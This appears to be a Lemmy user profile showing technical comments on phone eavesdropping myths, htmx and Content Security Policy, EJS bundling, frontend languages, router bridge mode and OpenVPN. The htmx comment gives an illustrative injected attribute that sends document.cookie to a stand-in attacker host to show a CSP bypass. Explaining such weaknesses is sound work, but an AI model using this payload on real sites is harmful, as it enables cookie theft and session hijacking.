• 2 Posts
  • 84 Comments
Joined 1 year ago
Cake day: July 4th, 2023





  • Do people seriously still think this is a thing?

    Literally anyone can run the basic numbers on the bandwidth that would be involved. There are only two options:

    1. They stream the audio out to their own servers, which process it there. The bandwidth involved would be INSTANTLY obvious, since streaming audio out is non-trivial and anyone can pop open their phone to monitor their network usage. You'd hit your data limit in 1-2 days, right away.

    2. They have the app always on, listening for "wakewords", which trigger the recording, and only then does it stream audio out. Wakewords, plural, is doing a LOT of heavy lifting here. Even one single wakeword takes a tremendous amount of training and money, and if they wanted the countless wakewords that would be required for what people are claiming? We're talking a LOT of money. But that's not all: running that sort of program is extremely resource intensive and, once again, you can monitor your phone's resource usage. You'd see the app at the top, burning through your battery like no tomorrow. Android and iPhone both notify you when a specific app is using a lot of battery power, so you'd instantly notice such an app running.
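    The option 1 math is easy to run yourself. A quick sketch (the 24 kbit/s bitrate is my assumption, roughly what a speech codec like Opus uses; the comment itself doesn't pick a number):

    ```javascript
    // Back-of-envelope math for option 1: continuously streaming
    // compressed voice audio off the device, 24/7.
    const kbitPerSec = 24;            // assumed low-bitrate voice codec
    const secPerDay = 24 * 60 * 60;

    // kilobits/day -> megabytes/day (divide by 8 for bytes, 1000 for mega)
    const mbPerDay = (kbitPerSec * secPerDay) / 8 / 1000;
    const gbPerMonth = (mbPerDay * 30) / 1000;

    console.log(`${mbPerDay.toFixed(0)} MB/day, ${gbPerMonth.toFixed(1)} GB/month of upload`);
    ```

    Even at a frugal speech bitrate that's hundreds of megabytes of *upload* per day, which would stick out immediately in any phone's per-app data usage screen.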

    I think a big part of this misunderstanding comes from the fact that Alexa/Google devices make wakeword detection look small and trivial.

    What people don't know, though, is that Alexa / Google Home devices have an entire dedicated board with its own dedicated processor JUST for detecting their ONE wakeword, and on top of that, they explicitly chose a phrase that is easy to listen for.

    “Okay Google” and “Hey Alexa” have a non-trivial amount of engineering baked into making sure they are distinct and unlikely to be mistaken for other words, and even despite that, they have false positives constantly.

    If that's the amount of resources involved for just one wakeword/phrase, you have to understand that targeted marketing would require hundreds of times that. It's not viable for your phone to do it 24/7 without also doubling as a hand warmer in your pocket all day long.










  • Htmx has logic that basically bypasses Content Security Policy entirely: it has its own baked-in “execute inline JS” mechanism that runs arbitrary JavaScript from attributes on HTML elements.

    Since this gets executed by the htmx logic you load from their library, it effectively allows an attacker to execute arbitrary JS by manipulating the DOM, and Content Security Policy won't catch it, because htmx parses the attribute and executes on its behalf (and you have already whitelisted htmx in your CSP for it to function at all).

    Result: It punctures a giant hole in your CSP, rendering it useless.

    There’s technically a flag you can flip to disable this functionality, but it's set via the DOM, so… not reliable, imo. If I could pre-compile htmx ahead of time with that functionality completely disabled, to the degree it doesn't even get compiled into the output .js at all, then I would trust it.

    But as long as all the logic is still technically there in the library I've loaded, and I'm purely relying on “this flag in the DOM should block this from working, probably”, I don't see that as very secure.
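    To make the mechanism concrete, here's a rough sketch based on my reading of htmx's `hx-on` attribute and its meta-tag config (the payload is a hypothetical example, and the exact scope of the flag is my assumption; check htmx's own security docs):

    ```html
    <!-- If an attacker can inject markup anywhere htmx processes, an
         attribute like this runs as JavaScript: no <script> tag, so the
         script-src directive in your CSP never sees it. Payload is a
         hypothetical example: -->
    <button hx-on:click="fetch('https://attacker.example/?c=' + document.cookie)">
      Click me
    </button>

    <!-- The DOM-level opt-out flag referred to above, set via htmx's
         meta-tag config mechanism: -->
    <meta name="htmx-config" content='{"allowEval":false}'>
    ```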

    So until that gets fixed and I can compile htmx with webpack or vite and completely treeshake that functionality right the hell out of my output, I ain't gonna recommend anyone use it if they want an iota of security on their site. It's got security bypasses literally baked in; don't use it.

    Hell, I'd even be happy if they just released an “htmx-lite” package that doesn't have that functionality baked in. That'd be enough to make me consider it.


  • I’m not liking htmx. I checked it out and it seemed promising, but it has giant gaping security holes, so I can't endorse it.

    I have been sticking to using EJS with html-bundler-webpack-plugin.

    The combo is lightning fast and gives me solid HTML partials, so I can modularize my front end into reusable chunks.

    It compiles the static site fast for iterative development, and it has everything I need baked in for the common needs (minification, bundling, transpiling, cache busting, integrity, crossorigin, tree shaking, etc.).
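    For reference, a minimal config sketch along the lines of html-bundler-webpack-plugin's documented usage; the entry path here is my own illustrative choice, not a drop-in config:

    ```js
    // webpack.config.js - hypothetical minimal setup (paths are examples)
    const HtmlBundlerPlugin = require('html-bundler-webpack-plugin');

    module.exports = {
      plugins: [
        new HtmlBundlerPlugin({
          entry: {
            // each EJS page compiles to a static HTML output
            index: 'src/views/index.ejs',
          },
          preprocessor: 'ejs', // render EJS partials at build time
        }),
      ],
    };
    ```

    The plugin treats the HTML/EJS templates as the entry points, so scripts and styles referenced from them get bundled, hashed, and injected without separate boilerplate.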

    I like how it lets me just focus on actually writing the HTML + JS + CSS and not have to muck around with thirty boilerplate steps just to make the app run.

    If I need a lot of reactivity I’ll use Vue or Angular, but I so, so rarely need that.

    And now with the template element, half the time reactivity can just be done with that.

    The only time I actually need React/Vue is when I have to frequently mutate/delete in the DOM.

    But if I'm purely additive, only adding things to the DOM, template elements are plenty.
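    A minimal sketch of that additive pattern with a template element (the ids and helper name are made up for illustration):

    ```html
    <template id="row-tpl">
      <li><span class="name"></span></li>
    </template>
    <ul id="list"></ul>

    <script>
      // Clone the inert template, fill it in, and append - no framework needed.
      function addRow(name) {
        const node = document.getElementById('row-tpl').content.cloneNode(true);
        node.querySelector('.name').textContent = name;
        document.getElementById('list').appendChild(node);
      }
      addRow('first item');
    </script>
    ```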



  • pixxelkick@lemmy.world to Programmer Humor@lemmy.ml · PHP is dead? · 1 year ago

    It’s hard to justify using anything other than JS or, if you wanna be fancy, WebAssembly, for the frontend.

    Any other front end language involves generating Javascript from your language, which inevitably ends up with you making a weird Frankenstein project that mixes the two.

    I’d rather just use stuff like Webpack or Vite to compile my JS front-end out of JS (or TS) from the start. It always ends up being a cleaner result.

    My backend though can be whatever the fuck I want it to be.

    But if you ever think dynamically compiling/transpiling a JS front end on the fly, on demand, is a good idea, instead of simply delivering static pre-compiled/transpiled pages, you're part of the reason the web is so slow and bloated.

    It’s wild what projects people will build that take 3 entire seconds just to deliver a 500 kB static form that doesn't even need Angular to do anything. They turn a couple hundred kB into several MB for no useful reason.


  • No problem. The mode you are looking for is called Bridge Mode, and you'll need your setup to be:

    ISP -> ISP Router -> Your Router -> Rest of the network

    It’s crucial that your router is the only thing plugged into the ISP router, typically into port 1. You'll need to either look up the paperwork or talk to your ISP about how bridge mode works for their modem model.

    Keep in mind that once bridge mode is enabled on the ISP router, it loses its wifi network, so the only way to connect to it afterwards to configure it is a physical connection. If you mess it up, you'll need a laptop or smartphone you can physically connect via ethernet to port 1 of the ISP router to access its interface again.

    But once you get bridge mode working, your private router will get the public IP assigned to it instead, and it will act as the “real” router of your network.


  • You will need to open some ports, but ideally you just open up one port for a VPN and call it a day.

    If you want a really easy solution, you can buy one of the mid-to-high-end routers that comes with built-in OpenVPN support you can enable, then go through the process of making it the router for your network (usually by setting your modem to pass-through mode with your personal router immediately next in line, so it becomes the actual router of the network).

    If you do a search you should find a few decent models out there with OpenVPN support; then it's just a matter of enabling the feature in the router's interface, following its guide, and installing OpenVPN on your mobile phone(s).